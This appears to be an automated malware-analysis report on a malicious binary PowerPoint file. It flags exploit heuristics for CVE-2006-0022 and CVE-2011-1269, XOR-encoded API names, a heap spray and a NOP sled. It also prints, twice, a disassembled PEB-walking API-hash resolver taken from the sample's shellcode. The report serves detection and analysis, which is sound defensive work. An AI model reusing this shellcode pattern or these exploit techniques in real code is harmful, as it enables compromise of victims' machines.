MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1055 Process Injection
The sample leverages critical heuristics indicating exploitation of PowerPoint vulnerabilities (CVE_2006_0022 and CVE_2011_1269 / MS11-036 family). It contains a binary-format RCE payload, likely delivered via process injection, and exhibits characteristics of a NOP sled and heap spray. The XOR-encoded strings suggest obfuscation of malicious code.
Heuristics 7
-
CVE-2006-0022 — PowerPoint malformed TextHeaderAtom critical CVE exact CVE_2006_0022The PowerPoint Document stream contains a malformed TextHeaderAtom whose textType is outside the valid range. This is the OffVis-compatible structural trigger for the MS06-028 PowerPoint malformed-record vulnerability.
-
PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family critical CVE likely PPT_BINARY_MEMORY_CORRUPTION_PAYLOADA macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
-
XOR-encoded strings (key 0x81) critical SC_XOR_ENCODEDFound 2 Windows library/API name(s) XOR-encoded with single-byte key 0x81: 'LoadLibraryA', 'GetProcAddress'Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 95% of instructions — a sled or padding/filler run, not program logic).
-
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
x86 disassembly · validity: code (1.0) — 2/2 branch targets land on an instruction boundary (100% coherence)000006D0 64a130000000 mov eax, dword ptr fs:[0x30] 000006D6 8b400c mov eax, dword ptr [eax + 0xc] 000006D9 8b701c mov esi, dword ptr [eax + 0x1c] 000006DC ad lodsd eax, dword ptr [esi] 000006DD 8b7008 mov esi, dword ptr [eax + 8] 000006E0 e907020000 jmp 0x8ec 000006E5 58 pop eax 000006E6 81ec00020000 sub esp, 0x200 000006EC 8bfc mov edi, esp 000006EE 8b18 mov ebx, dword ptr [eax] 000006F0 895f04 mov dword ptr [edi + 4], ebx 000006F3 897708 mov dword ptr [edi + 8], esi 000006F6 83c004 add eax, 4 000006F9 89470c mov dword ptr [edi + 0xc], eax 000006FC 57 push edi 000006FD 56 push esi 000006FE 68ad9b7ddf push 0xdf7d9bad 00000703 e890010000 call 0x898 00000708 8bf0 mov esi, eax 0000070A 33ff xor edi, edi 0000070C 6a00 push 0 0000070E 57 push edi 0000070F ffd6 call esi 00000711 3d00d20100 cmp eax, 0x1d200 00000716 7403 je 0x71b 00000718 47 inc edi 00000719 ebf1 jmp 0x70c 0000071B 8bc7 mov eax, edi 0000071D 5f pop edi 0000071E 894710 mov dword ptr [edi + 0x10], eax 00000721 ff7708 push dword ptr [edi + 8] 00000724 68ec97030c push 0xc0397ec 00000729 e86a010000 call 0x898 0000072E 89 .byte 0x89 0000072F 47 inc edi
-
PEB API-hash resolver high SC_API_HASH_RESOLVERPEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
Disassembly
x86 disassembly · validity: code (1.0) — 2/2 branch targets land on an instruction boundary (100% coherence)000006D0 64a130000000 mov eax, dword ptr fs:[0x30] 000006D6 8b400c mov eax, dword ptr [eax + 0xc] 000006D9 8b701c mov esi, dword ptr [eax + 0x1c] 000006DC ad lodsd eax, dword ptr [esi] 000006DD 8b7008 mov esi, dword ptr [eax + 8] 000006E0 e907020000 jmp 0x8ec 000006E5 58 pop eax 000006E6 81ec00020000 sub esp, 0x200 000006EC 8bfc mov edi, esp 000006EE 8b18 mov ebx, dword ptr [eax] 000006F0 895f04 mov dword ptr [edi + 4], ebx 000006F3 897708 mov dword ptr [edi + 8], esi 000006F6 83c004 add eax, 4 000006F9 89470c mov dword ptr [edi + 0xc], eax 000006FC 57 push edi 000006FD 56 push esi 000006FE 68ad9b7ddf push 0xdf7d9bad 00000703 e890010000 call 0x898 00000708 8bf0 mov esi, eax 0000070A 33ff xor edi, edi 0000070C 6a00 push 0 0000070E 57 push edi 0000070F ffd6 call esi 00000711 3d00d20100 cmp eax, 0x1d200 00000716 7403 je 0x71b 00000718 47 inc edi 00000719 ebf1 jmp 0x70c 0000071B 8bc7 mov eax, edi 0000071D 5f pop edi 0000071E 894710 mov dword ptr [edi + 0x10], eax 00000721 ff7708 push dword ptr [edi + 8] 00000724 68ec97030c push 0xc0397ec 00000729 e86a010000 call 0x898 0000072E 89 .byte 0x89 0000072F 47 inc edi
-
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes foundDisassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x41 bytesDisassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
Open this report in the interactive analyzer, or submit your own file for analysis.